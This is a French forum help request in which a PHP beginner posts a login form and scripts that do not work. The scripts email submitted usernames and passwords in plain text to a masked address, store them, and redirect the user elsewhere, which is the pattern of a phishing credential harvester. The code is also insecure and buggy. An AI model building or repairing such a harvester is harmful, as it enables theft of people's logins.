bonjour
Ca fait 2 semaine que je débute avec php, un grand merci a vos tutos qui sont géniaux, du coup je me suis entrainée sur une page test pour récupérer mes donnés formulaire directement dans un fichier .txt puis par envoie mail mais rien n'apparait ni du coté mail ni du coté txt .Du coup j'ai changée pour que les donnés vont directement vers une base de donné mysql de l'herbergeur en ayant bien configurée le phpmyadmin... mais idem ca ne fonctionne pas, depuis 2 jours j'essaye de comprendre ce qui ne fonctionne pas( apache, synthaxe…)j’ai cherchée un peu partout mais je ne vois pas
voici ma page test de questionformulaire
Code : Sélectionner tout - Visualiser dans une fenêtre à part
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29 <!doctype html> <html> <head> <link href="style.css" rel="stylesheet"> <meta charset="UTF-8"> <title>PAGETEST</title> </head> <body> <form method="post" action="MONSCRIPT.php"> <p><br> </br> </p> <p> </p> <p> </p> <p> <input id="identifiant" type="text" name="identifiant" placeholder="identifiant" required autofocus> <input id="password" type="password" name="password" required autofocus> </p> <input type="submit" formaction="PAGETEST2.html" onClick="PAGETEST2.html" value="Valider"> <p> </p> <p> </p> <p> </p> </form> </body> </html>
MONSCRIPT ===>txt /mail
1
2
3
4
5
6
7
8
9
10
11
12
13 <?php $fp = fopen("donnes.txt", "a"); $identifiant=utf8_decode($_POST["identifiant"]); $password==utf8_decode($_POST["password"]); $to='******@******'; echo( "Votre identifiant: <b>".$identifiant ."</b><br>\n" ) ; echo( "Votrepassword: <b>".$password ."</b><br>\n" ) ; fclose($fp); ?>
Script===> mysql/mail
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54 <?php $DB_host = ***; $DB_login = ****; $DB_pass = ******; $DB_select = *****; // Connexion à notre base de donnée $con = mysql_connect($DB_host, $DB_login, $DB_pass); if (!$con) { die('Erreur de connexion: ' . mysql_error()); } $db= mysql_select_db($DB_select, $con); $identifiant=mysql_real_escape_string($_POST["identifiant"]); $password=mysql_real_escape_string($_POST["password"]); // S'il l'on met un identifiant if ((isset($_POST["identifiant"]))&&($_POST["identifiant"]!="")){ // S'il l'on met un mot de passe if ((isset($_POST["password"]))&&($_POST["password"]!="")){ // On crée une variable contenant les identifiants $all = 'Identifiant : ' . $_REQUEST['identifiant']. "\n". 'password : ' . $_REQUEST['password'] ; // On envoi les identifiants à notre adresse mail voulu mail('*******@******','Formulaire', $all ); // On vérifie que les identifiants n'ont pas été déjà enregistrés $SQL="SELECT * FROM `*********`.`****` WHERE identifiant='$identifiant' AND password='$password'"; $res=mysql_query($SQL); // Si les identifiants ne sont pas déjà présent if(mysql_num_rows($res)==0){ // On ajoute les identifiants à notre base de donnée. $SQL="INSERT INTO `***********`.`****` (`identifiant` ,`password`)VALUES ('$identifiant', '$password')"; $res=mysql_query($SQL); } } } mysql_close(); ?> <?php ?> <html><head><meta http-equiv='refresh' content='0; URL=http://mapagetest2.lt/test2.html'></head><body></body></html>
Partager